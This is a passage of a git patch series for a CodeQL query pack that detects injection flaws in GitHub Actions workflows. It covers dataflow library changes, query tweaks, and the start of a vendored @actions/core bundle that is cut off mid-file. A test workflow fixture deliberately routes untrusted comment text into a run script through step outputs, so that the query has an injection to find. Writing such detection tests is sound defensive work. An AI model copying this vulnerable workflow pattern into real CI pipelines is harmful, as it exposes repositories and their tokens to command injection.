b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 045910ed676..12be2d89998 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,9 +133,10 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() } /** @@ -196,9 +197,8 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and - astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -259,9 +259,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { exists(CtxAccessExpr access | - (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + ( + access instanceof NeedsCtxAccessExpr or + access instanceof StepsCtxAccessExpr or + access instanceof JobsCtxAccessExpr + ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and node1.asExpr() = access.getRefExpr() and node2.asExpr() = access @@ -272,12 +279,13 @@ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store an output expression (node1) into its OutputsStm node (node2) - * with a given access path (fieldName) + * Stores an output expression (node1) into its OutputsStm node (node2) + * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(OutputsStmt out, string fieldName | @@ -291,6 +299,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or From 3c12e43d3fa1c5ae4fc878aab68540b15172b69b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 18:09:12 +0100 Subject: [PATCH 0034/1267] feat(composite-actions): Fix summary and source queries for composite actions analysis --- .../dataflow/internal/DataFlowPrivate.qll | 25 ------------------- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++++++++++++ .../CWE-020/CompositeActionSummaries.ql | 2 -- .../CWE-020/CompositeActionsSources.ql | 8 +++++- 4 files changed, 32 insertions(+), 28 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 12be2d89998..89f31983189 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -139,31 +139,6 @@ newtype TContent = name = any(JobsCtxAccessExpr a).getFieldName() } -/** - * A reference contained in an object. Examples include instance fields, the - * contents of a collection object, the contents of an array or pointer. - */ -class Content extends TContent { - /** Gets the type of the contained data for the purpose of type pruning. */ - DataFlowType getType() { any() } - - /** Gets a textual representation of this element. */ - abstract string toString(); - - /** - * Holds if this element is at the specified location. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `filepath`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 - } -} - predicate forceHighPrecision(Content c) { c instanceof FieldContent } class ContentApprox = ContentSet; diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 52101c7e5a7..8b62cccf30a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -130,6 +130,31 @@ class ContentSet instanceof Content { } } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ +class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + + /** Gets a textual representation of this element. */ + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} + /** A field of an object, for example an instance variable. */ class FieldContent extends Content, TFieldContent { private string name; diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 00a70eeed2f..875492644b8 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -17,12 +17,10 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index f67811b3f5f..19c43ad3066 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -23,9 +23,15 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } } module MyFlow = TaintTracking::Global; From 1cd32195a7f807d4a63d25ca13946b0d4de657d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 11:51:28 +0100 Subject: [PATCH 0035/1267] feat(bash-step): Improve bash step accuracy Only pass the taint when the env var is directlty set as the step output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +++--------- .../Security/CWE-094/ExpressionInjection.ql | 3 +-- .../workflows/image_link_generator.yml | 26 +++---------------- 3 files changed, 8 insertions(+), 37 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index faa7c4c3ebe..bc0c782e9ff 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,11 +21,6 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -// private class RunEnvToScriptStep extends AdditionalTaintStep { -// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { -// runEnvToScriptstep(pred, succ) -// } -// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. @@ -34,11 +29,9 @@ class AdditionalTaintStep extends Unit { * env: * BODY: ${{ github.event.comment.body }} * run: | - * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - * echo "Cleaned Initial URL: $INITIAL_URL" - * echo "::set-output name=initial_url::$INITIAL_URL" - * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT - * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | @@ -51,8 +44,7 @@ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, Data output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and - // TODO: repalce script with line below - script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r ) diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4b47a154a1d..99779d6cc90 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -37,5 +37,4 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + - " }}, which may be controlled by an external user." + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 9ebb7bbf2be..c8a30dad294 100644 --- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -17,41 +17,21 @@ jobs: env: BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" + echo "::set-output name=initial_url::$BODY" - name: Get Redirected URL with Debugging id: curl env: INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - + echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT - name: Trim URL after PNG id: trim-url env: REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" + echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" From 499c3e7ac3f152b224268752870fa9369b151187 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 15 Feb 2024 12:03:06 +0100 Subject: [PATCH 0036/1267] Improve regexs --- ql/lib/codeql/actions/Ast.qll | 16 +++++++++++----- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e5f9e35a4a9..b04694ed568 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -355,15 +355,21 @@ class CtxAccessExpr extends ExprAccessExpr { abstract Expression getRefExpr(); } -private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string stepsCtxRegex() { + result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string needsCtxRegex() { + result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } +private string jobsCtxRegex() { + result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" +} -private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } +private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } +private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } /** * Holds for an expression accesing the `steps` context. diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2b35b2f332f..09094f2c580 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -137,7 +137,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource { } /** - * Composite action input sources + * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionStmt c; From 0105d63a4423368d25be3249a88432b2fe233a8e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:25:23 +0100 Subject: [PATCH 0037/1267] Add Action to scan repos --- .github/action/.gitignore | 1 + .github/action/dist/index.js | 30712 +++++++++++++++++++++++++++++ .github/action/dist/licenses.txt | 175 + .github/action/package-lock.json | 639 + .github/action/package.json | 48 + .github/action/src/codeql.ts | 158 + .github/action/src/index.ts | 61 + .github/action/tsconfig.json | 24 + .github/workflows/build.yml | 30 + action.yml | 19 + ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 12 files changed, 31869 insertions(+), 2 deletions(-) create mode 100644 .github/action/.gitignore create mode 100644 .github/action/dist/index.js create mode 100644 .github/action/dist/licenses.txt create mode 100644 .github/action/package-lock.json create mode 100644 .github/action/package.json create mode 100644 .github/action/src/codeql.ts create mode 100644 .github/action/src/index.ts create mode 100644 .github/action/tsconfig.json create mode 100644 .github/workflows/build.yml create mode 100644 action.yml diff --git a/.github/action/.gitignore b/.github/action/.gitignore new file mode 100644 index 00000000000..c2658d7d1b3 --- /dev/null +++ b/.github/action/.gitignore @@ -0,0 +1 @@ +node_modules/ diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js new file mode 100644 index 00000000000..e13da63ecda --- /dev/null +++ b/.github/action/dist/index.js @@ -0,0 +1,30712 @@ +/******/ (() => { // webpackBootstrap +/******/ var __webpack_modules__ = ({ + +/***/ 7351: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.issue = exports.issueCommand = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const utils_1 = __nccwpck_require__(5278); +/** + * Commands + * + * Command Format: + * ::name key=value,key=value::message + * + * Examples: + * ::warning::This is the message + * ::set-env name=MY_VAR::some value + */ +function issueCommand(command, properties, message) { + const cmd = new Command(command, properties, message); + process.stdout.write(cmd.toString() + os.EOL); +} +exports.issueCommand = issueCommand; +function issue(name, message = '') { + issueCommand(name, {}, message); +} +exports.issue = issue; +const CMD_STRING = '::'; +class Command { + constructor(command, properties, message) { + if (!command) { + command = 'missing.command'; + } + this.command = command; + this.properties = properties; + this.message = message; + } + toString() { + let cmdStr = CMD_STRING + this.command; + if (this.properties && Object.keys(this.properties).length > 0) { + cmdStr += ' '; + let first = true; + for (const key in this.properties) { + if (this.properties.hasOwnProperty(key)) { + const val = this.properties[key]; + if (val) { + if (first) { + first = false; + } + else { + cmdStr += ','; + } + cmdStr += `${key}=${escapeProperty(val)}`; + } + } + } + } + cmdStr += `${CMD_STRING}${escapeData(this.message)}`; + return cmdStr; + } +} +function escapeData(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A'); +} +function escapeProperty(s) { + return utils_1.toCommandValue(s) + .replace(/%/g, '%25') + .replace(/\r/g, '%0D') + .replace(/\n/g, '%0A') + .replace(/:/g, '%3A') + .replace(/,/g, '%2C'); +} +//# sourceMappingURL=command.js.map + +/***/ }), + +/***/ 2186: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; +const command_1 = __nccwpck_require__(7351); +const file_command_1 = __nccwpck_require__(717); +const utils_1 = __nccwpck_require__(5278); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const oidc_utils_1 = __nccwpck_require__(8041); +/** + * The code to exit an action + */ +var ExitCode; +(function (ExitCode) { + /** + * A code indicating that the action was successful + */ + ExitCode[ExitCode["Success"] = 0] = "Success"; + /** + * A code indicating that the action was a failure + */ + ExitCode[ExitCode["Failure"] = 1] = "Failure"; +})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); +//----------------------------------------------------------------------- +// Variables +//----------------------------------------------------------------------- +/** + * Sets env variable for this action and future actions in the job + * @param name the name of the variable to set + * @param val the value of the variable. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function exportVariable(name, val) { + const convertedVal = utils_1.toCommandValue(val); + process.env[name] = convertedVal; + const filePath = process.env['GITHUB_ENV'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); + } + command_1.issueCommand('set-env', { name }, convertedVal); +} +exports.exportVariable = exportVariable; +/** + * Registers a secret which will get masked from logs + * @param secret value of the secret + */ +function setSecret(secret) { + command_1.issueCommand('add-mask', {}, secret); +} +exports.setSecret = setSecret; +/** + * Prepends inputPath to the PATH (for this action and future actions) + * @param inputPath + */ +function addPath(inputPath) { + const filePath = process.env['GITHUB_PATH'] || ''; + if (filePath) { + file_command_1.issueFileCommand('PATH', inputPath); + } + else { + command_1.issueCommand('add-path', {}, inputPath); + } + process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; +} +exports.addPath = addPath; +/** + * Gets the value of an input. + * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. + * Returns an empty string if the value is not defined. + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string + */ +function getInput(name, options) { + const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; + if (options && options.required && !val) { + throw new Error(`Input required and not supplied: ${name}`); + } + if (options && options.trimWhitespace === false) { + return val; + } + return val.trim(); +} +exports.getInput = getInput; +/** + * Gets the values of an multiline input. Each value is also trimmed. + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns string[] + * + */ +function getMultilineInput(name, options) { + const inputs = getInput(name, options) + .split('\n') + .filter(x => x !== ''); + if (options && options.trimWhitespace === false) { + return inputs; + } + return inputs.map(input => input.trim()); +} +exports.getMultilineInput = getMultilineInput; +/** + * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. + * Support boolean input list: `true | True | TRUE | false | False | FALSE` . + * The return value is also in boolean type. + * ref: https://yaml.org/spec/1.2/spec.html#id2804923 + * + * @param name name of the input to get + * @param options optional. See InputOptions. + * @returns boolean + */ +function getBooleanInput(name, options) { + const trueValue = ['true', 'True', 'TRUE']; + const falseValue = ['false', 'False', 'FALSE']; + const val = getInput(name, options); + if (trueValue.includes(val)) + return true; + if (falseValue.includes(val)) + return false; + throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + + `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); +} +exports.getBooleanInput = getBooleanInput; +/** + * Sets the value of an output. + * + * @param name name of the output to set + * @param value value to store. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function setOutput(name, value) { + const filePath = process.env['GITHUB_OUTPUT'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); + } + process.stdout.write(os.EOL); + command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); +} +exports.setOutput = setOutput; +/** + * Enables or disables the echoing of commands into stdout for the rest of the step. + * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. + * + */ +function setCommandEcho(enabled) { + command_1.issue('echo', enabled ? 'on' : 'off'); +} +exports.setCommandEcho = setCommandEcho; +//----------------------------------------------------------------------- +// Results +//----------------------------------------------------------------------- +/** + * Sets the action status to failed. + * When the action exits it will be with an exit code of 1 + * @param message add error issue message + */ +function setFailed(message) { + process.exitCode = ExitCode.Failure; + error(message); +} +exports.setFailed = setFailed; +//----------------------------------------------------------------------- +// Logging Commands +//----------------------------------------------------------------------- +/** + * Gets whether Actions Step Debug is on or not + */ +function isDebug() { + return process.env['RUNNER_DEBUG'] === '1'; +} +exports.isDebug = isDebug; +/** + * Writes debug message to user log + * @param message debug message + */ +function debug(message) { + command_1.issueCommand('debug', {}, message); +} +exports.debug = debug; +/** + * Adds an error issue + * @param message error issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function error(message, properties = {}) { + command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.error = error; +/** + * Adds a warning issue + * @param message warning issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function warning(message, properties = {}) { + command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.warning = warning; +/** + * Adds a notice issue + * @param message notice issue message. Errors will be converted to string via toString() + * @param properties optional properties to add to the annotation. + */ +function notice(message, properties = {}) { + command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); +} +exports.notice = notice; +/** + * Writes info to log with console.log. + * @param message info message + */ +function info(message) { + process.stdout.write(message + os.EOL); +} +exports.info = info; +/** + * Begin an output group. + * + * Output until the next `groupEnd` will be foldable in this group + * + * @param name The name of the output group + */ +function startGroup(name) { + command_1.issue('group', name); +} +exports.startGroup = startGroup; +/** + * End an output group. + */ +function endGroup() { + command_1.issue('endgroup'); +} +exports.endGroup = endGroup; +/** + * Wrap an asynchronous function call in a group. + * + * Returns the same type as the function itself. + * + * @param name The name of the group + * @param fn The function to wrap in the group + */ +function group(name, fn) { + return __awaiter(this, void 0, void 0, function* () { + startGroup(name); + let result; + try { + result = yield fn(); + } + finally { + endGroup(); + } + return result; + }); +} +exports.group = group; +//----------------------------------------------------------------------- +// Wrapper action state +//----------------------------------------------------------------------- +/** + * Saves state for current action, the state can only be retrieved by this action's post job execution. + * + * @param name name of the state to store + * @param value value to store. Non-string values will be converted to a string via JSON.stringify + */ +// eslint-disable-next-line @typescript-eslint/no-explicit-any +function saveState(name, value) { + const filePath = process.env['GITHUB_STATE'] || ''; + if (filePath) { + return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); + } + command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); +} +exports.saveState = saveState; +/** + * Gets the value of an state set by this action's main execution. + * + * @param name name of the state to get + * @returns string + */ +function getState(name) { + return process.env[`STATE_${name}`] || ''; +} +exports.getState = getState; +function getIDToken(aud) { + return __awaiter(this, void 0, void 0, function* () { + return yield oidc_utils_1.OidcClient.getIDToken(aud); + }); +} +exports.getIDToken = getIDToken; +/** + * Summary exports + */ +var summary_1 = __nccwpck_require__(1327); +Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); +/** + * @deprecated use core.summary + */ +var summary_2 = __nccwpck_require__(1327); +Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); +/** + * Path exports + */ +var path_utils_1 = __nccwpck_require__(2981); +Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); +Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); +Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); +//# sourceMappingURL=core.js.map + +/***/ }), + +/***/ 717: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +// For internal use, subject to change. +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +const fs = __importStar(__nccwpck_require__(7147)); +const os = __importStar(__nccwpck_require__(2037)); +const uuid_1 = __nccwpck_require__(5840); +const utils_1 = __nccwpck_require__(5278); +function issueFileCommand(command, message) { + const filePath = process.env[`GITHUB_${command}`]; + if (!filePath) { + throw new Error(`Unable to find environment variable for file command ${command}`); + } + if (!fs.existsSync(filePath)) { + throw new Error(`Missing file at path: 